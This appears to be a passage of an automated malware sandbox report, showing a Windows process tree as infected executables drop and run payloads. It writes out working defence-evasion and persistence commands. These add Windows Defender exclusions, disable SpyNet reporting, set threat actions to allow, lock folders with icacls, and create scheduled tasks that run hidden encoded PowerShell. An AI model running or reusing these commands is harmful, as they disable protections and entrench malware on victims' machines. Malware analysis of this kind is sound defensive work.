                                            "C:\Users\Admin\Pictures\x9x6GlDYA69bSYKoEslox6Nt.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=5128 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240325045634" --session-guid=d8af42bd-7281-4e94-abc7-ea4e612496e1 --server-tracking-blob=YWZlOWJkMGIyYTdiNmJjNDhhOTNjYzEyMTYwMzIwYTM1MzI5NmJhY2YzNjY0ZTY0MDAxNjFiMGYyMWNhOTY1YTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcxMTM0MjU5MC4zOTgyIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiI2YTE2ZmMzMi1jMDZhLTQwNDQtOWQ4YS03MzhiZWRlNWM3ODcifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=4804000000000000
                                            5⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Enumerates connected drives
                                            PID:5504
                                            • C:\Users\Admin\Pictures\x9x6GlDYA69bSYKoEslox6Nt.exe
                                              C:\Users\Admin\Pictures\x9x6GlDYA69bSYKoEslox6Nt.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.40 --initial-client-data=0x2c0,0x2c4,0x2c8,0x290,0x2cc,0x6c9e21f8,0x6c9e2204,0x6c9e2210
                                              6⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              PID:5568
                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403250456341\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
                                            "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403250456341\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"
                                            5⤵
                                            • Executes dropped EXE
                                            PID:3960
                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403250456341\assistant\assistant_installer.exe
                                            "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403250456341\assistant\assistant_installer.exe" --version
                                            5⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            PID:3424
                                            • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403250456341\assistant\assistant_installer.exe
                                              "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403250456341\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0xcf0040,0xcf004c,0xcf0058
                                              6⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              PID:2836
                                        • C:\Users\Admin\Pictures\6jdAr7x3ptuZUrkEpVFFWkcu.exe
                                          "C:\Users\Admin\Pictures\6jdAr7x3ptuZUrkEpVFFWkcu.exe"
                                          4⤵
                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                          • Checks BIOS information in registry
                                          • Executes dropped EXE
                                          • Checks whether UAC is enabled
                                          • Drops file in System32 directory
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          PID:5724
                                        • C:\Users\Admin\Pictures\LRyfFnDiechQmRWuDLsH4pWZ.exe
                                          "C:\Users\Admin\Pictures\LRyfFnDiechQmRWuDLsH4pWZ.exe"
                                          4⤵
                                          • Executes dropped EXE
                                          PID:5792
                                          • C:\Users\Admin\AppData\Local\Temp\7zS630.tmp\Install.exe
                                            .\Install.exe
                                            5⤵
                                            • Executes dropped EXE
                                            PID:5488
                                            • C:\Users\Admin\AppData\Local\Temp\7zS9BA.tmp\Install.exe
                                              .\Install.exe /EdidNQpJP "385118" /S
                                              6⤵
                                              • Checks BIOS information in registry
                                              • Executes dropped EXE
                                              • Drops file in System32 directory
                                              • Enumerates system info in registry
                                              PID:6120
                                              • C:\Windows\SysWOW64\forfiles.exe
                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                7⤵
                                                  PID:4020
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                    8⤵
                                                      PID:2244
                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                        9⤵
                                                          PID:3452
                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                          9⤵
                                                            PID:5800
                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                        7⤵
                                                          PID:5032
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                            8⤵
                                                              PID:1384
                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                9⤵
                                                                  PID:1320
                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                  9⤵
                                                                    PID:4900
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /CREATE /TN "gRadLRdUm" /SC once /ST 03:23:40 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                7⤵
                                                                • DcRat
                                                                • Creates scheduled task(s)
                                                                PID:4236
                                                                • C:\Windows\System32\Conhost.exe
                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  8⤵
                                                                    PID:5384
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  schtasks /run /I /tn "gRadLRdUm"
                                                                  7⤵
                                                                    PID:2168
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    schtasks /DELETE /F /TN "gRadLRdUm"
                                                                    7⤵
                                                                      PID:4664
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      schtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 04:58:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\vYsGwPi.exe\" id /hlsite_iduKA 385118 /S" /V1 /F
                                                                      7⤵
                                                                      • DcRat
                                                                      • Drops file in Windows directory
                                                                      • Creates scheduled task(s)
                                                                      PID:3204
                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                            "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                                                            2⤵
                                                            • Blocklisted process makes network request
                                                            • Loads dropped DLL
                                                            PID:4704
                                                          • C:\Users\Admin\AppData\Local\Temp\1000087001\amadka.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\1000087001\amadka.exe"
                                                            2⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            PID:5952
                                                        • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                          C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                          1⤵
                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                          • Checks BIOS information in registry
                                                          • Executes dropped EXE
                                                          • Identifies Wine through registry keys
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:3344
                                                        • \??\c:\windows\system32\svchost.exe
                                                          c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                          1⤵
                                                            PID:5184
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                            1⤵
                                                              PID:5188
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\E2D9.bat" "
                                                              1⤵
                                                                PID:6064
                                                                • C:\Windows\System32\Conhost.exe
                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  2⤵
                                                                    PID:4700
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
                                                                    2⤵
                                                                      PID:5436
                                                                  • C:\Users\Admin\AppData\Local\Temp\F79B.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\F79B.exe
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:5800
                                                                    • C:\Users\Admin\AppData\Local\Temp\F79B.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\F79B.exe
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      • Adds Run key to start application
                                                                      PID:5176
                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                        icacls "C:\Users\Admin\AppData\Local\9aef9d5f-cd4c-4b22-8dde-0e99d2d559e8" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                        3⤵
                                                                        • Modifies file permissions
                                                                        PID:5756
                                                                      • C:\Users\Admin\AppData\Local\Temp\F79B.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\F79B.exe" --Admin IsNotAutoStart IsNotTask
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetThreadContext
                                                                        PID:4984
                                                                        • C:\Users\Admin\AppData\Local\Temp\F79B.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\F79B.exe" --Admin IsNotAutoStart IsNotTask
                                                                          4⤵
                                                                          • Executes dropped EXE
                                                                          PID:5700
                                                                          • C:\Users\Admin\AppData\Local\64913d46-c958-4195-bb04-8451adfe863a\build2.exe
                                                                            "C:\Users\Admin\AppData\Local\64913d46-c958-4195-bb04-8451adfe863a\build2.exe"
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:5200
                                                                            • C:\Users\Admin\AppData\Local\64913d46-c958-4195-bb04-8451adfe863a\build2.exe
                                                                              "C:\Users\Admin\AppData\Local\64913d46-c958-4195-bb04-8451adfe863a\build2.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              PID:1324
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1324 -s 2060
                                                                                7⤵
                                                                                • Program crash
                                                                                PID:2548
                                                                          • C:\Users\Admin\AppData\Local\64913d46-c958-4195-bb04-8451adfe863a\build3.exe
                                                                            "C:\Users\Admin\AppData\Local\64913d46-c958-4195-bb04-8451adfe863a\build3.exe"
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:5192
                                                                            • C:\Users\Admin\AppData\Local\64913d46-c958-4195-bb04-8451adfe863a\build3.exe
                                                                              "C:\Users\Admin\AppData\Local\64913d46-c958-4195-bb04-8451adfe863a\build3.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              PID:5096
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                7⤵
                                                                                • DcRat
                                                                                • Creates scheduled task(s)
                                                                                PID:3792
                                                                  • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                    1⤵
                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                    • Checks BIOS information in registry
                                                                    • Executes dropped EXE
                                                                    • Identifies Wine through registry keys
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    PID:5140
                                                                  • C:\Users\Admin\AppData\Local\Temp\1000082001\boom8.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\1000082001\boom8.exe
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    PID:1028
                                                                  • C:\Users\Admin\AppData\Local\Temp\1AE3.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\1AE3.exe
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:3152
                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                      2⤵
                                                                      • Modifies system certificate store
                                                                      PID:4320
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                    1⤵
                                                                      PID:5412
                                                                      • C:\Windows\system32\gpupdate.exe
                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                        2⤵
                                                                          PID:5968
                                                                      • \??\c:\windows\system32\svchost.exe
                                                                        c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                        1⤵
                                                                          PID:4360
                                                                        • \??\c:\windows\system32\gpscript.exe
                                                                          gpscript.exe /RefreshSystemParam
                                                                          1⤵
                                                                            PID:3816
                                                                          • C:\Windows\windefender.exe
                                                                            C:\Windows\windefender.exe
                                                                            1⤵
                                                                            • Executes dropped EXE
                                                                            • Modifies data under HKEY_USERS
                                                                            PID:5520
                                                                          • C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\vYsGwPi.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\vYsGwPi.exe id /hlsite_iduKA 385118 /S
                                                                            1⤵
                                                                            • Executes dropped EXE
                                                                            • Drops file in System32 directory
                                                                            PID:4872
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                              2⤵
                                                                              • Drops file in System32 directory
                                                                              • Modifies data under HKEY_USERS
                                                                              PID:5072
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                3⤵
                                                                                  PID:3816
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                    4⤵
                                                                                      PID:1880
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                    3⤵
                                                                                      PID:2676
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                      3⤵
                                                                                        PID:5544
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                        3⤵
                                                                                          PID:4896
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                          3⤵
                                                                                            PID:5940
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                            3⤵
                                                                                              PID:2240
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                              3⤵
                                                                                                PID:5336
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                3⤵
                                                                                                  PID:2500
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                  3⤵
                                                                                                    PID:5528
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                    3⤵
                                                                                                      PID:4964
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                      3⤵
                                                                                                        PID:2760
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                        3⤵
                                                                                                          PID:1284
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                          3⤵
                                                                                                            PID:1344
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                            3⤵
                                                                                                              PID:5384
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                              3⤵
                                                                                                                PID:3152
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                3⤵
                                                                                                                  PID:5880
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                  3⤵
                                                                                                                    PID:5432
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                    3⤵
                                                                                                                      PID:3192
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                      3⤵
                                                                                                                        PID:3976
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                        3⤵
                                                                                                                          PID:6072
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                          3⤵
                                                                                                                            PID:60
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
